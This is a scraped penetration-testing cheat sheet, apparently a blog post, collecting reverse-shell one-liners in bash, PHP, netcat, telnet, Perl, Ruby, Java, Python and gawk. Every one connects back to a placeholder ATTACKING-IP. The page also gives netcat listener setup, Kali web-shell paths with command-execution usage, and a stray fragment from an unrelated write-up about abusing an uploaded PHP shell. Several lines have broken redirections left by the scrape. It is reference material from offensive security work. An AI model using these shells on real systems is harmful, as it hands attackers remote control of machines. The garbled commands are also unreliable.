During penetration testing if you’re lucky enough to find a remote command execution vulnerability, you’ll more often than not want to connect back to your attacking machine to leverage an interactive shell.
Below are a collection of reverse shells that use commonly installed programming languages, or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.
Setup Listening Netcat
Your remote shell will need a listening netcat instance in order to connect back.
Set your Netcat listening shell on an allowed port
Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443
To setup a listening netcat instance, enter the following:
1 2 3 |
<span class="gp">root@kali:~# </span>nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 0.0.0.0 80 ... |
NAT requires a port forward
If you’re attacking machine is behing a NAT router, you’ll need to setup a port forward to the attacking machines IP / Port.
ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).
Bash Reverse Shells
1 |
<span class="nb">exec</span> /bin/bash 0&0 2>&0 |
1 |
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 |
1 2 3 4 5 6 |
<span class="nb">exec </span>5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | <span class="k">while </span><span class="nb">read </span>line; <span class="k">do</span> <span class="nv">$line</span> 2>&5 >&5; <span class="k">done</span> <span class="c"># or:</span> <span class="k">while </span><span class="nb">read </span>line 0<&5; <span class="k">do</span> <span class="nv">$line</span> 2>&5 >&5; <span class="k">done</span> |
1 |
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 |
PHP Reverse Shell
1 2 |
php -r <span class="s1">'$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'</span> <span class="o">(</span>Assumes TCP uses file descriptor 3. If it doesn<span class="s1">'t work, try 4,5, or 6)</span> |
Netcat Reverse Shell
1 |
nc -e /bin/sh ATTACKING-IP 80 |
1 |
/bin/sh | nc ATTACKING-IP 80 |
1 |
rm -f /tmp/p; mknod /tmp/p p <span class="o">&&</span> nc ATTACKING-IP 4444 0/tmp/p |
Telnet Reverse Shell
1 |
rm -f /tmp/p; mknod /tmp/p p <span class="o">&&</span> telnet ATTACKING-IP 80 0/tmp/p |
1 |
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 |
Remember to listen on 443 on the attacking machine also.
Perl Reverse Shell
1 |
<span class="nv">perl</span> <span class="o">-</span><span class="nv">e</span> <span class="s">'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</span> |
Perl Windows Reverse Shell
1 |
<span class="nv">perl</span> <span class="o">-</span><span class="nv">MIO</span> <span class="o">-</span><span class="nv">e</span> <span class="s">'$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'</span> |
1 |
<span class="nv">perl</span> <span class="o">-</span><span class="nv">e</span> <span class="s">'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</span> |
Ruby Reverse Shell
1 |
<span class="n">ruby</span> <span class="o">-</span><span class="n">rsocket</span> <span class="o">-</span><span class="n">e</span><span class="s1">'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'</span> |
Java Reverse Shell
1 2 3 |
<span class="n">r</span> <span class="o">=</span> <span class="n">Runtime</span><span class="o">.</span><span class="na">getRuntime</span><span class="o">()</span> <span class="n">p</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="na">exec</span><span class="o">([</span><span class="s">"/bin/bash"</span><span class="o">,</span><span class="s">"-c"</span><span class="o">,</span><span class="s">"exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"</span><span class="o">]</span> <span class="n">as</span> <span class="n">String</span><span class="o">[])</span> <span class="n">p</span><span class="o">.</span><span class="na">waitFor</span><span class="o">()</span> |
Python Reverse Shell
1 |
<span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span> |
Gawk Reverse Shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } } |
Kali Web Shells
The following shells exist within Kali Linux, under /usr/share/webshells/
these are only useful if you are able to upload, inject or transfer the shell to the machine.
Kali PHP Web Shells
COMMAND | DESCRIPTION |
---|---|
/usr/share/webshells/php/ |
Pen Test Monkey – PHP Reverse Shell |
/usr/share/webshells/ /usr/share/webshells/ |
Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80 |
/usr/share/webshells/ |
PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple- |
/usr/share/webshells/ |
Larger PHP shell, with a text input box for command execution. |
Tip: Executing Reverse Shells
The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.
Kali Perl Reverse Shell
COMMAND | DESCRIPTION |
---|---|
/usr/share/webshells/perl/ |
Pen Test Monkey – Perl Reverse Shell |
/usr/share/webshells/ |
Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd |
Kali Cold Fusion Shell
COMMAND | DESCRIPTION |
---|---|
/usr/share/webshells/cfm/cfexec.cfm |
Cold Fusion Shell – aka CFM Shell |
Kali ASP Shell
COMMAND | DESCRIPTION |
---|---|
/usr/share/webshells/asp/ |
Kali ASP Shells |
Kali ASPX Shells
COMMAND | DESCRIPTION |
---|---|
/usr/share/webshells/aspx/ |
Kali ASPX Shells |
Kali JSP Reverse Shell
COMMAND | DESCRIPTION |
---|---|
/usr/share/webshells/jsp/jsp-reverse.jsp |
Kali JSP Reverse Shell |
You might want to read :
1- Kali Linux Hackers Cheat Sheet https://www.ethicalhackx.com/kali-linux-hacking-commands-list
At this point, I thought about trying to use some programming languages to do the shell connection. Python was unfortunately not installed in the machine (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which python) but Perl actually existed (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which perl) so by having this Perl reverse shell snippet from ethicalhackx: